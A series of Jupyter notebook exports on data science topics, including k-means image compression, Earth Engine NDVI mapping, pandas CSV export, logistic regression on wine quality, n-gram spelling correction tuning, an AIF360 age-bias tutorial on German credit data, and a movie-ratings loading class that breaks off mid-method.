print('Accuracy:', 1 - np.abs(clusters - y).sum()/y.shape[0])
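# A label-permutation-free alternative (sketch, not in the original): the
# adjusted Rand index compares the two partitions without the manual recoding.
from sklearn.metrics import adjusted_rand_score
print('Adjusted Rand index:', adjusted_rand_score(y, clusters))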
###Output
_____no_output_____
###Markdown
Task 2 - perform vector quantization with $k$-means on a figure. You need to install the Pillow package: `pip install Pillow`. [(docs here)](https://pillow.readthedocs.io/en/5.3.x/index.html) First some code that brings you to the task itself.
###Code
from PIL import Image
# open and conver to grayscale
im = Image.open("figure.jpg").convert("L")
# covert to numpy array of numbers between 0 and 1
pix = np.array(im)/255.0
print('Shape of the array:', pix.shape)
# visualize
plt.imshow(pix, cmap="gray", clim=(0, 1));
plt.show()
###Output
_____no_output_____
###Markdown
Now the task:* crop the image width to be a multiple of 4* create column blocks of length 4 - i.e. subparts from the original image of the shape (1,4)* perform k-means clustering with k = 255 - i.e. one byte will be sufficient to transmit the cluster indices* extract centroids and labels from the clustering* decode them back to the array of the original shape - **hint** - use: `restored = np.take(centroids, labels, axis = 0)`* visualize the result* discuss the size reduction (compression) when one uses the centroids and labels instead of the original pixels (a rough estimate is sketched at the end of the solution code below).
###Code
## your code here
# set block length to 4
block_len = 4
# crop the image to optimal size
rows,cols = pix.shape
pix = pix[:, :(cols - cols % block_len)]
# reshape the figure to create the blocks
X = pix.reshape(-1, block_len)
print(X.shape)
# perform clusterring
k = 255 # i.e. one byte will be sufficient for transfering the values
kmeans = KMeans(n_clusters = k, random_state = 1, n_init = 2).fit(X)
# extract the centroids and labels
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
print(centroids.shape)
print(labels.shape)
# restore the compressed image from centroids and labels
restored = np.take(centroids, labels, axis = 0)
final_pix = restored.reshape(pix.shape)
# visualize a result
plt.imshow(final_pix, cmap="gray", clim=(0, 1));
plt.show()
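# Rough size-reduction estimate (a sketch; assumes float64 pixel values before
# quantization and one byte per label plus the float64 codebook afterwards):
original_bytes = X.size * 8
compressed_bytes = labels.size + centroids.size * 8
print('Approximate compression ratio: %.1fx' % (original_bytes / compressed_bytes))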
###Output
_____no_output_____ |
tarea/Respuesta.ipynb | ###Markdown
**Welcome!** This *colab notebook* is part of the [**Introduccion a Google Earth Engine con Python**](https://github.com/csaybar/EarthEngineMasterGIS) course developed by the [**MasterGIS**](https://www.mastergis.com/) team. Get more information about the course at this [**link**](https://www.mastergis.com/product/google-earth-engine/). The course content is available on [**GitHub**](https://github.com/csaybar/EarthEngineMasterGIS) under the [**MIT**](https://opensource.org/licenses/MIT) license.
###Code
###Output
_____no_output_____
###Markdown
**Solved Exercise: Spectral Index Map - NDVI**
###Code
# Authenticate and initialize Google Earth Engine
import ee
ee.Authenticate()
ee.Initialize()
#@title mapdisplay: Creates interactive maps using folium
import folium
def mapdisplay(center, dicc, Tiles="OpenStreetMap", zoom_start=10):
'''
:param center: Center of the map (Latitude and Longitude).
:param dicc: Earth Engine Geometries or Tiles dictionary
:param Tiles: Mapbox Bright,Mapbox Control Room,Stamen Terrain,Stamen Toner,stamenwatercolor,cartodbpositron.
:zoom_start: Initial zoom level for the map.
:return: A folium.Map object.
'''
center = center[::-1]
mapViz = folium.Map(location=center,tiles=Tiles, zoom_start=zoom_start)
for k,v in dicc.items():
if ee.image.Image in [type(x) for x in v.values()]:
folium.TileLayer(
tiles = v["tile_fetcher"].url_format,
attr = 'Google Earth Engine',
overlay =True,
name = k
).add_to(mapViz)
else:
folium.GeoJson(
data = v,
name = k
).add_to(mapViz)
mapViz.add_child(folium.LayerControl())
return mapViz
###Output
_____no_output_____
###Markdown
**1. Load vector data**
###Code
colombia = ee.FeatureCollection('users/sergioingeo/Colombia/Col')
colombia_img = colombia.draw(color = "000000", strokeWidth = 3, pointRadius = 3)
centroide = colombia.geometry().centroid().getInfo()['coordinates']
# Display the ROI
mapdisplay(centroide,{'colombia':colombia_img.getMapId()},zoom_start= 6)
###Output
_____no_output_____
###Markdown
**2. Load raster data (Images)**
###Code
# Landsat 8 "Surface Reflectance" image collection
coleccion = ee.ImageCollection("LANDSAT/LC08/C01/T1_SR")\
.filterDate('2018-01-01', '2018-12-31')\
.filterBounds(colombia)\
.filterMetadata('CLOUD_COVER' ,'less_than',50)
###Output
_____no_output_____
###Markdown
**3. Computing the normalized index.** Use .normalizedDifference to carry out this exercise.
###Code
def ndvi(image):
return image.normalizedDifference([ 'B5' ,'B4']).rename('NDVI')
ndvi = coleccion.map(ndvi).mean().clip(colombia)
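# For reference (a sketch of what normalizedDifference does under the hood):
# normalizedDifference(['B5', 'B4']) computes (B5 - B4) / (B5 + B4), i.e.
# NDVI = (NIR - Red) / (NIR + Red) for Landsat 8 bands.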
palette = [
'FFFFFF','CE7E45','DF923D','F18555','FCD163','998718',
'74A901','66A000','529400','3E8601','207401','056201',
'004C00','023801','012E01','011D01','011D01','011301']
NDVI= ndvi.getMapId({'min': 0, 'max': 1, 'palette':palette })
mapdisplay(centroide,{'NDVI':NDVI },zoom_start= 6)
###Output
_____no_output_____
###Markdown
**4. Download the results (From Google Earth Engine to Google Drive)** **ee.batch.Export.table.toDrive():** Saves a FeatureCollection as a shapefile in Google Drive. **ee.batch.Export.image.toDrive():** Saves an Image as GeoTIFF in Google Drive.
###Code
# Where
# image: the raster image holding the index information
# description: the name the file will have in Google Drive.
# folder: the folder that will be created in Google Drive.
# region: the area of the created product to export.
# maxPixels: raises or limits the maximum number of pixels that can be exported.
# scale: the pixel size of the exported image, in meters.
task = ee.batch.Export.image.toDrive(
image= ndvi,
description='NDVI_Colombia',
folder='TareaMASTERGIS',
scale= 1000,
region = colombia.geometry(),
maxPixels = 1e13)
task.start()
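# A hypothetical companion export (sketch, not part of the exercise): the ROI
# itself could be saved as a shapefile with ee.batch.Export.table.toDrive, e.g.:
# task_vec = ee.batch.Export.table.toDrive(
#     collection=colombia,
#     description='Colombia_ROI',
#     folder='TareaMASTERGIS',
#     fileFormat='SHP')
# task_vec.start()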
from google.colab import drive
drive.mount('/content/drive')
#@title Final course message
%%html
<marquee style='width: 30%; color: blue;'><b>THANK YOU VERY MUCH, I HOPE YOU HAD FUN TAKING THIS COURSE :3 ... UNTIL NEXT TIME</b></marquee>
###Output
_____no_output_____ |
Export Pandas DataFrame Sebagai File csv.ipynb | ###Markdown
Export a Pandas DataFrame as a CSV File. The following article is a short pandas tutorial on using the to_csv function along with the options most often used when exporting a Pandas DataFrame to a csv file. Let's get straight to **CODING**! Dataset: before we code, we will build a simple dataset consisting of three fields: Name, Python Score, and Average Score.
###Code
import pandas as pd
dataset = {
'Name': ['Andi','Budi','Candil','Dudung'],
'Python Score': [75, 84, 95, 64],
'Average Score': [80.67, 75.5, 89.3, 72.45]
}
df = pd.DataFrame(dataset)
print (df)
###Output
Name Python Score Average Score
0 Andi 75 80.67
1 Budi 84 75.50
2 Candil 95 89.30
3 Dudung 64 72.45
###Markdown
Export the Pandas DataFrame to a csv File
###Code
df.to_csv('filename.csv')
###Output
_____no_output_____
###Markdown
To drop the index so that it is not included in the exported csv file, use the **index** option set to **False**
###Code
df.to_csv('filename.csv', index=False)
###Output
_____no_output_____
###Markdown
The sep option: the **sep** option is used to change the delimiter as desired. The default delimiter is a comma '**,**'
###Code
df.to_csv('filename.csv',sep='\t')
###Output
_____no_output_____
###Markdown
The header option: if you need to export a Pandas DataFrame to a csv file without including the header or column names, use the **header** option set to **False**
###Code
df.to_csv('filename.csv',header=False)
###Output
_____no_output_____
###Markdown
The columns option: to select which columns will be exported, use the **columns** option
###Code
df.to_csv('filename.csv',columns=['Name', 'Average Score'])
###Output
_____no_output_____
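###Markdown
These options can also be combined in a single call (a short sketch):
###Code
df.to_csv('filename.csv', index=False, sep=';', columns=['Name', 'Average Score'])
###Output
_____no_output_____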
###Markdown
The float_format option: the float_format option can be used to format float-typed data
###Code
df.to_csv('filename.csv',float_format='%.2f')
###Output
_____no_output_____
###Markdown
The na_rep option: to assign a specific value to columns or fields containing null values, use the **na_rep** option directly. The example below fills null values with '**Unknown**'
###Code
df.to_csv('filename.csv',na_rep='Unknown')
###Output
_____no_output_____ |
.ipynb_checkpoints/logistic-regression-volatile-acidity-red-checkpoint.ipynb | ###Markdown
Logistic Regression: Logistic Regression is a statistical method for predicting binary outcomes from data. Examples of this are "yes" vs "no" or "young" vs "old". These are categories that translate to a probability of being a 0 or a 1. Source: Logistic Regression. We can calculate logistic regression by adding an activation function as the final step to our linear model. This converts the linear regression output to a probability.
###Code
%matplotlib notebook
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
import pandas as pd
import numpy as np
import os
###Output
_____no_output_____
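###Markdown
As a minimal illustration of the activation idea above (a sketch, not part of the original notebook), the sigmoid maps any linear-model output onto a probability:
###Code
import numpy as np

def sigmoid(z):
    # squashes a real-valued linear output into the (0, 1) range
    return 1.0 / (1.0 + np.exp(-z))

print(sigmoid(0.0))  # 0.5, the decision boundary
###Output
_____no_output_____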
###Markdown
Load the data
###Code
df = pd.read_csv(os.path.join(".", "assets", "winequality-red.csv"))
df.head()
y = df["quality"]
y
X = df.drop("quality", axis=1)
X.head()
print(f"Labels: {y[:10]}")
print(f"Data: {X[:10]}")
# Visualizing both classes
#plt.scatter(X[:, 0], X[:, 1], c=y)
y_arr = y.to_numpy()
y_arr
X_arr = X.to_numpy()
X_arr
X_arr[:,1]
###Output
_____no_output_____
###Markdown
Split our data into training and testing
###Code
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X_arr, y_arr, random_state=1)
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(max_iter=40000)
classifier
classifier.fit(X_train, y_train)
print(f"Training Data Score: {classifier.score(X_train, y_train)}")
print(f"Testing Data Score: {classifier.score(X_test, y_test)}")
X = X_arr
X
y = y_arr
y
# Review for Volatile Acidity
plt.scatter(X[:, 1], y, c=y)
plt.title("Logistic Regression of Red Wine Quality Factors")
plt.xlabel("Volatile Acidity")
plt.ylabel("Quality")
plt.savefig("output-data/Logistic-Regression-Red-Wine-VolitleAcidity.png")
plt.show()
print(X, y)
predictions = classifier.predict(X_test)
pd.DataFrame({"Prediction": predictions, "Actual": y_test})
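# Optional extra (sketch): per-class precision/recall for the quality labels
from sklearn.metrics import classification_report
print(classification_report(y_test, predictions))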
###Output
_____no_output_____ |
src/noisy/ngrams_noisy.ipynb | ###Markdown
Load data
###Code
corpus_dir = '../../data/corpus/'
model_dir = '../../data/ngrams/'
noisy = pd.read_csv(f'{corpus_dir}noisy.csv')
noisy.shape
###Output
_____no_output_____
###Markdown
Load Ngram Language Models
###Code
with open(f'{model_dir}counter.pickle', 'rb') as file:
counter = pickle.load(file)
with open(f'{model_dir}vocabulary.pickle', 'rb') as file:
vocabulary = pickle.load(file)
###Output
_____no_output_____
###Markdown
Lidstone (add-α smoothing) trigram
###Code
trigramL = MLidstone(gamma=0.0063, order=3, vocabulary=vocabulary, counter=counter)
channel = NoisyChannelModel(trigramL)
###Output
_____no_output_____
###Markdown
Poisson Channel model
###Code
def best_l(l):
channel.l = l
df = channel.beam_search_sentences(noisy.err)
return np.array([wer(correct, changed) for correct, changed in zip(noisy.cor, df[0].str.lower())]).mean()
channel.channel_method_poisson = True
channel.channel_prob_param = 0.01
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Normalized and inversely proportional to edit distances channel model
###Code
channel.channel_method_poisson = False
channel.channel_prob_param = 0.99
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Interpolated with Kneser-Ney smoothing trigram
###Code
trigramKNI = MKneserNeyInterpolated(order=3, discount=0.9276, vocabulary=vocabulary, counter=counter)
channel = NoisyChannelModel(trigramKNI)
###Output
_____no_output_____
###Markdown
Poisson Channel model
###Code
channel.channel_method_poisson = True
channel.channel_prob_param = 0.01
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____
###Markdown
Normalized and inversely proportional to edit distances channel model
###Code
channel.channel_method_poisson = False
channel.channel_prob_param = 0.99
best = fmin(fn=best_l, space=hp.uniform('l', 0.2, 5), algo=tpe.suggest, max_evals=20)
best['l']
###Output
_____no_output_____ |
documents/spring20/RDS_Lab_2_2020.ipynb | ###Markdown
Detecting and mitigating age bias on credit decisions. The goal of this tutorial is to introduce the basic functionality of AI Fairness 360. Biases and Machine Learning: A machine learning model makes predictions of an outcome for a particular instance. (Given an instance of a loan application, predict if the applicant will repay the loan.) The model makes these predictions based on a training dataset, where many other instances (other loan applications) and actual outcomes (whether they repaid) are provided. Thus, a machine learning algorithm will attempt to find patterns, or generalizations, in the training dataset to use when a prediction for a new instance is needed. (For example, one pattern it might discover is "if a person has salary > USD 40K and has outstanding debt < USD 5, they will repay the loan".) In many domains this technique, called supervised machine learning, has worked very well. However, sometimes the patterns that are found may not be desirable or may even be illegal. For example, a loan repayment model may determine that age plays a significant role in the prediction of repayment because the training dataset happened to have better repayment for one age group than for another. This raises two problems: 1) the training dataset may not be representative of the true population of people of all age groups, and 2) even if it is representative, it is illegal to base any decision on an applicant's age, regardless of whether this is a good prediction based on historical data. AI Fairness 360 is designed to help address this problem with _fairness metrics_ and _bias mitigators_. Fairness metrics can be used to check for bias in machine learning workflows. Bias mitigators can be used to overcome bias in the workflow to produce a more fair outcome. The loan scenario describes an intuitive example of illegal bias. However, not all undesirable bias in machine learning is illegal; it may also exist in more subtle ways. For example, a loan company may want a diverse portfolio of customers across all income levels, and thus will deem it undesirable if they are making more loans to high income levels over low income levels. Although this is not illegal or unethical, it is undesirable for the company's strategy. As these two examples illustrate, a bias detection and/or mitigation toolkit needs to be tailored to the particular bias of interest. More specifically, it needs to know the attribute or attributes, called _protected attributes_, that are of interest: race is one example of a _protected attribute_ and age is a second. The Machine Learning Workflow: To understand how bias can enter a machine learning model, we first review the basics of how a model is created in a supervised machine learning process. First, the process starts with a _training dataset_, which contains a sequence of instances, where each instance has two components: the features and the correct prediction for those features. Next, a machine learning algorithm is trained on this training dataset to produce a machine learning model. This generated model can be used to make a prediction when given a new instance. A second dataset with features and correct predictions, called a _test dataset_, is used to assess the accuracy of the model. Since this test dataset is the same format as the training dataset, a set of instances of features and prediction pairs, often these two datasets derive from the same initial dataset.
A random partitioning algorithm is used to split the initial dataset into training and test datasets. Bias can enter the system in any of the three steps above. The training dataset may be biased in that its outcomes may be biased towards particular kinds of instances. The algorithm that creates the model may be biased in that it may generate models that are weighted towards particular features in the input. The test dataset may be biased in that it has expectations on correct answers that may be biased. These three points in the machine learning process represent points for testing and mitigating bias. In the AI Fairness 360 codebase, we call these points _pre-processing_, _in-processing_, and _post-processing_. AI Fairness 360: We are now ready to utilize AI Fairness 360 (`aif360`) to detect and mitigate bias. We will use the German credit dataset, splitting it into a training and test dataset. We will look for bias in the creation of a machine learning model to predict if an applicant should be given credit based on various features from a typical credit application. The protected attribute will be "Age", with "1" (older than or equal to 25) and "0" (younger than 25) being the values for the privileged and unprivileged groups, respectively. For this first tutorial, we will check for bias in the initial training data, mitigate the bias, and recheck. More sophisticated machine learning workflows are given in the author tutorials and demo notebooks in the codebase. Here are the steps involved: Step 1: Write import statements. Step 2: Set bias detection options, load dataset, and split between train and test. Step 3: Compute fairness metric on original training dataset. Step 4: Mitigate bias by transforming the original dataset. Step 5: Compute fairness metric on transformed training dataset. Step 1 Import Statements: As with any Python program, the first step will be to import the necessary packages. Below we import several components from the `aif360` package. We import the GermanDataset, metrics to check for bias, and classes related to the algorithm we will use to mitigate bias.
###Code
# Load all necessary packages
import sys
sys.path.insert(1, "../")
import numpy as np
np.random.seed(0)
from aif360.datasets import GermanDataset
from aif360.metrics import BinaryLabelDatasetMetric, DatasetMetric
from aif360.algorithms.preprocessing import Reweighing
from aif360.explainers import MetricTextExplainer, MetricJSONExplainer
from IPython.display import Markdown, display
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import json
from collections import OrderedDict
###Output
_____no_output_____
###Markdown
Step 2 Load dataset, specifying protected attribute, and split dataset into train and test: In Step 2 we load the initial dataset, setting the protected attribute to be age. We then split the original dataset into training and testing datasets. Although we will use only the training dataset in this tutorial, a normal workflow would also use a test dataset for assessing the efficacy (accuracy, fairness, etc.) during the development of a machine learning model. Finally, we set two variables (to be used in Step 3) for the privileged (1) and unprivileged (0) values for the age attribute. These are key inputs for detecting and mitigating bias, which will be Step 3 and Step 4. What is the German Credit Risk dataset? The original dataset contains 1000 entries with 20 categorical/symbolic attributes prepared by Prof. Hofmann. In this dataset, each entry represents a person who takes a credit from a bank. Each person is classified as a good or bad credit risk according to the set of attributes. The original dataset can be found at https://archive.ics.uci.edu/ml/datasets/Statlog+%28German+Credit+Data%29 Loading dataset: protected_attribute means the attribute on which the bias can occur, i.e. the attribute you want to test bias for. privileged_classes means a subset of protected attribute values which are considered privileged from a fairness perspective. In the German dataset: Old (age >= 25) are the privileged class and Young (age < 25) are the unprivileged class. Here we have binary membership in a protected group (age) and this is a binary classification problem. Here, age is the sensitive attribute, and Old (age >= 25) is the protected group, i.e. the historically systematically advantaged group. The dataset is already encoded, as the algorithms need the dataset to have numerical values rather than categorical ones.
###Code
dataset_orig = GermanDataset(protected_attribute_names=['age'], # this dataset also contains protected
# attribute for "sex" which we do not
# consider in this evaluation
privileged_classes=[lambda x: x >= 25], # age >=25 is considered privileged
features_to_drop=['personal_status', 'sex']) # ignore sex-related attributes
dataset_orig_train, dataset_orig_test = dataset_orig.split([0.7], shuffle=True)
privileged_groups = [{'age': 1}]
unprivileged_groups = [{'age': 0}]
print("Original one hot encoded german dataset shape: ",dataset_orig.features.shape)
print("Train dataset shape: ", dataset_orig_train.features.shape)
print("Test dataset shape: ", dataset_orig_test.features.shape)
###Output
Original one hot encoded german dataset shape: (1000, 57)
Train dataset shape: (700, 57)
Test dataset shape: (300, 57)
###Markdown
The object dataset_orig is an aif360 dataset, which has some useful methods and attributes that you can explore: instance_weights: weighting for each instance, all equal (ones) by default. metadata: returns a dict which contains details about the creation of the dataset. convert_to_dataframe: converts a structured dataset to a pandas dataframe. de_dummy_code = True: converts dummy-coded columns to categories. set_category = True: sets the de-dummy-coded features to categorical type. More documentation is available at https://aif360.readthedocs.io/en/latest/modules/datasets.html. For now, we'll just transform it into a pandas dataframe.
###Code
df, dict_df = dataset_orig.convert_to_dataframe()
print("Shape: ", df.shape)
print(df.columns)
df.head(5)
###Output
Shape: (1000, 58)
Index(['month', 'credit_amount', 'investment_as_income_percentage',
'residence_since', 'age', 'number_of_credits', 'people_liable_for',
'status=A11', 'status=A12', 'status=A13', 'status=A14',
'credit_history=A30', 'credit_history=A31', 'credit_history=A32',
'credit_history=A33', 'credit_history=A34', 'purpose=A40',
'purpose=A41', 'purpose=A410', 'purpose=A42', 'purpose=A43',
'purpose=A44', 'purpose=A45', 'purpose=A46', 'purpose=A48',
'purpose=A49', 'savings=A61', 'savings=A62', 'savings=A63',
'savings=A64', 'savings=A65', 'employment=A71', 'employment=A72',
'employment=A73', 'employment=A74', 'employment=A75',
'other_debtors=A101', 'other_debtors=A102', 'other_debtors=A103',
'property=A121', 'property=A122', 'property=A123', 'property=A124',
'installment_plans=A141', 'installment_plans=A142',
'installment_plans=A143', 'housing=A151', 'housing=A152',
'housing=A153', 'skill_level=A171', 'skill_level=A172',
'skill_level=A173', 'skill_level=A174', 'telephone=A191',
'telephone=A192', 'foreign_worker=A201', 'foreign_worker=A202',
'credit'],
dtype='object')
###Markdown
Let's take a look at our primary variables of interest.
###Code
print("Key: ", dataset_orig.metadata['protected_attribute_maps'][1])
df['age'].value_counts().plot(kind='bar')
plt.xlabel("Age (0 = under 25, 1 = over 25)")
plt.ylabel("Frequency")
print("Key: ", dataset_orig.metadata['label_maps'])
df['credit'].value_counts().plot(kind='bar')
plt.xlabel("Credit (1 = Good Credit, 2 = Bad Credit)")
plt.ylabel("Frequency")
###Output
Key: [{1.0: 'Good Credit', 2.0: 'Bad Credit'}]
###Markdown
Take a minute to explore the relationship between these two variables. Do credit scores vary with age?
###Code
# Your code here
###Output
_____no_output_____
###Markdown
Step 3 Compute fairness metric on original training dataset: Now that we've identified the protected attribute 'age' and defined privileged and unprivileged values, we can use aif360 to detect bias in the dataset. Mean Difference (same as statistical parity): Compare the percentage of favorable results for the privileged and unprivileged groups, subtracting the former percentage from the latter. The ideal value of this metric is 0. A value < 0 indicates less favorable outcomes for the unprivileged groups. This is implemented in the method called mean_difference on the BinaryLabelDatasetMetric class. The code below performs this check and displays the output, showing that the difference is -0.169905.
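In symbols: mean difference = Pr(Y = favorable | D = unprivileged) - Pr(Y = favorable | D = privileged); the code below evaluates exactly this quantity.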
###Code
metric_orig_train = BinaryLabelDatasetMetric(dataset_orig_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print("Original training dataset")
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference())
###Output
_____no_output_____
###Markdown
Disparate Impact: Computed as the ratio of the rate of favorable outcome for the unprivileged group to that of the privileged group. The ideal value of this metric is 1.0. A value < 1 implies a higher benefit for the privileged group, and a value > 1 implies a higher benefit for the unprivileged group.
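In symbols: disparate impact = Pr(Y = favorable | D = unprivileged) / Pr(Y = favorable | D = privileged).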
###Code
print("Original training dataset")
print("Disparate Impact = %f" % metric_orig_train.disparate_impact())
###Output
_____no_output_____
###Markdown
Explainers Text Explanations
###Code
text_expl = MetricTextExplainer(metric_orig_train)
json_expl = MetricJSONExplainer(metric_orig_train)
#print(text_expl.mean_difference())
#print(text_expl.disparate_impact())
###Output
Disparate impact (probability of favorable outcome for unprivileged instances / probability of favorable outcome for privileged instances): 0.7664297113013201
###Markdown
JSON Explanations
###Code
def format_json(json_str):
return json.dumps(json.loads(json_str, object_pairs_hook=OrderedDict), indent=2)
#print(format_json(json_expl.mean_difference()))
#print(format_json(json_expl.disparate_impact()))
###Output
{
"metric": "Disparate Impact",
"message": "Disparate impact (probability of favorable outcome for unprivileged instances / probability of favorable outcome for privileged instances): 0.7664297113013201",
"numPositivePredictionsUnprivileged": 63.0,
"numUnprivileged": 113.0,
"numPositivePredictionsPrivileged": 427.0,
"numPrivileged": 587.0,
"description": "Computed as the ratio of rate of favorable outcome for the unprivileged group to that of the privileged group.",
"ideal": "The ideal value of this metric is 1.0 A value < 1 implies higher benefit for the privileged group and a value >1 implies a higher benefit for the unprivileged group."
}
###Markdown
Step 4 Mitigate bias by transforming the original dataset: The previous step showed that the privileged group was getting 17% more positive outcomes in the training dataset. Since this is not desirable, we are going to try to mitigate this bias in the training dataset. As stated above, this is called _pre-processing_ mitigation because it happens before the creation of the model. AI Fairness 360 implements several pre-processing mitigation algorithms. We will choose the Reweighing algorithm [1], which is implemented in the `Reweighing` class in the `aif360.algorithms.preprocessing` package. This algorithm will transform the dataset to have more equity in positive outcomes on the protected attribute for the privileged and unprivileged groups. We then call the fit and transform methods to perform the transformation, producing a newly transformed training dataset (dataset_transf_train). `[1] F. Kamiran and T. Calders, "Data Preprocessing Techniques for Classification without Discrimination," Knowledge and Information Systems, 2012.` Reweighing: Reweighing is a data preprocessing technique that recommends generating weights for the training examples in each (group, label) combination differently to ensure fairness before classification. The idea is to apply appropriate weights to different tuples in the training dataset to make the training dataset discrimination-free with respect to the sensitive attributes. Instead of reweighing, one could also apply techniques (non-discrimination constraints) such as suppression (remove sensitive attributes) or massaging the dataset (modify the labels appropriately to remove discrimination from the training data). However, the reweighing technique is more effective than the other two mentioned earlier.
###Code
RW = Reweighing(unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
dataset_transf_train = RW.fit_transform(dataset_orig_train)
dataset_transf_train.instance_weights
len(dataset_transf_train.instance_weights)
###Output
_____no_output_____
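###Markdown
Reweighing assigns one weight per (group, label) combination, so the transformed dataset should contain exactly four distinct weight values (a quick sketch to verify this):
###Code
np.unique(dataset_transf_train.instance_weights)
###Output
_____no_output_____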
###Markdown
Step 5 Compute fairness metric on transformed dataset: Now that we have a transformed dataset, we can check how effective it was in removing bias by using the same metric we used for the original training dataset in Step 3. Once again, we use the function mean_difference in the BinaryLabelDatasetMetric class. We see the mitigation step was very effective: the difference in mean outcomes is now 0.0, so we went from a 17% advantage for the privileged group to equality in terms of mean outcome.
###Code
metric_transf_train = BinaryLabelDatasetMetric(dataset_transf_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print("Transformed training dataset")
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_transf_train.mean_difference())
print("Transformed training dataset")
print("Disparate Impact = %f" % metric_transf_train.disparate_impact())
###Output
_____no_output_____
###Markdown
Step 6: Try another algorithm! There are numerous other pre-processing mitigation algorithms implemented in aif360, described at the following link: https://aif360.readthedocs.io/en/latest/modules/preprocessing.html Take a minute to read about these options, then repeat Steps 4 and 5 above using a different algorithm (a commented sketch of one option is included in the cell below). How do the fairness metrics compare? What could explain your similar/different results?
###Code
# Set up the pre-processing mitigation algorithm
# Fit and transform the data
# Compute fairness metrics using your transformed data
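# One possible sketch (an assumption, not the only choice): Learning Fair
# Representations (LFR), another pre-processing algorithm in aif360.
# from aif360.algorithms.preprocessing import LFR
# lfr = LFR(unprivileged_groups=unprivileged_groups,
#           privileged_groups=privileged_groups)
# dataset_lfr_train = lfr.fit_transform(dataset_orig_train)
# metric_lfr_train = BinaryLabelDatasetMetric(dataset_lfr_train,
#                                             unprivileged_groups=unprivileged_groups,
#                                             privileged_groups=privileged_groups)
# print("Difference in mean outcomes = %f" % metric_lfr_train.mean_difference())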
###Output
_____no_output_____ |
actividad1OOP.ipynb | ###Markdown
###Code
# import modules
import numpy as np
import pandas as pd
# these are for plotting
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib notebook
class FilesManager():
    def __init__(self, path):
        self.path = path  # store the base path instead of relying on the global 'path'
    def readFileToPandas(self, fileName, separator, header):
        if header == True:
            return pd.read_csv(self.path + fileName, sep=separator, encoding='utf-8', header=0)
        else:
            return pd.read_csv(self.path + fileName, sep=separator, encoding="utf-8")
    def saveFromPandasToFile(self, pandasObject, fileName, separator):
        pandasObject.to_csv(self.path + fileName, sep=separator, encoding="utf-8")
class Graficos:
def __init__(self,datos,filesManager):
self.normalize=True
self.cm=datos.relations
self.labels=datos.genres
self.plt=plt
self.user_profiles = filesManager.readFileToPandas('user_profiles_frame.csv',';',True);
def createPlot(self,path):
if self.normalize:
self.cm = self.cm.astype('float') / self.cm.sum(axis=0)[:, np.newaxis]
print("Normalized matrix")
else:
self.cm = self.cm * 1e+2
print('Matrix, without normalization')
        fig, ax = self.plt.subplots(figsize=(10, 20))  # pass figsize directly; the stray bare assignment had no effect
im = ax.imshow(self.cm, interpolation='nearest', cmap=self.plt.cm.Reds)
ax.set(xticks=np.arange(self.cm.shape[1]),
yticks=np.arange(self.cm.shape[0]),
xticklabels=self.labels, yticklabels=self.labels,
title="Relations matrix",
ylabel='GENRES',
xlabel='GENRES')
self.plt.xticks(rotation='vertical')
        fmt = '.2f' if self.normalize else '.0f'  # cm holds floats even when not normalized
thresh = self.cm.max() / 2.
for i in range(self.cm.shape[0]):
for j in range(self.cm.shape[1]):
ax.text(j, i, format(self.cm[i, j], fmt),
ha="center", va="center",
color="white" if self.cm[i, j] > thresh else "black")
fig.tight_layout()
self.plt.colorbar(im)
self.plt.savefig(path+"plot_realtions.png")
def getPlot(self):
return self.plt
def getUserProfiles(self):
list(self.user_profiles)
self.user_profiles = self.user_profiles.rename(columns = {'Unnamed: 0':'Index'})
self.user_profiles = self.user_profiles.drop(['(no genres listed)', 'Index'], axis = 1)
self.user_profiles = self.user_profiles.round(2)
self.user_profiles = self.user_profiles.set_index(['userId'])
self.user_profiles.head()
return self.user_profiles
import time
class Datos:
    def __init__(self):
        # declare the attributes up front; they are filled in by the load methods
        self.ratings = None
        self.movies = None
        self.ranked_movies = None
        self.user_profiles_frame = None
        self.user_id = None
        self.user_profiles = None
        self.genres_counts = None
        self.genres = None
        self.new_ratings = None
        self.resume_scores = None
        self.scores = None
        self.n_ratings = None
        self.means = None
        self.counts = None
        self.ids = None
def importData(self,path,filesManager,ratingsFile,moviesFile):
self.ratings = filesManager.readFileToPandas(ratingsFile,',',False)
self.movies = filesManager.readFileToPandas(moviesFile,',',False)
def getRatings(self):
return self.ratings
def getMovies(self):
return self.movies
def loadRankedMovies(self):
self.ranked_movies = pd.DataFrame()
self.ranked_movies["movieId"] = self.ratings[self.ratings["rating"] > 4.5]["movieId"].unique()
self.ranked_movies["title"] = [self.movies[self.movies["movieId"] == m_id]["title"].values.flatten()[0]for m_id in self.ranked_movies["movieId"]]
self.new_ratings= self.ratings[self.ratings["movieId"].isin(self.ranked_movies["movieId"])]
def getRankedMovies(self):
return self.ranked_movies
def setRankedMovies(self,rankedMovies):
self.ranked_movies=rankedMovies
def loadGenres(self,filesManager):
self.genres= ["Action", "Adventure", "Animation", "Children", "Comedy",
"Crime", "Documentary", "Drama", "Fantasy", "Film-Noir", "Horror",
"Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War",
"Western", "(no genres listed)", "IMAX"]
self.scores = []
self.n_ratings = []
self.ids=[]
for g in self.genres:
for i, row in self.movies.iterrows():
if g in row["genres"]:
self.ids.append(row["movieId"])
collect_ratings = self.ratings[self.ratings["movieId"].isin(self.ids)]["rating"]
self.scores.append(collect_ratings.mean())
self.n_ratings.append(len(collect_ratings))
print("Genre: ", g, "done")
        # create the dataframe
self.resume_scores = pd.DataFrame()
self.resume_scores["genres"] = self.genres
self.resume_scores["scores"] = self.scores
self.resume_scores["n_ratings"] = self.n_ratings
        # sort by the mean score of the genre
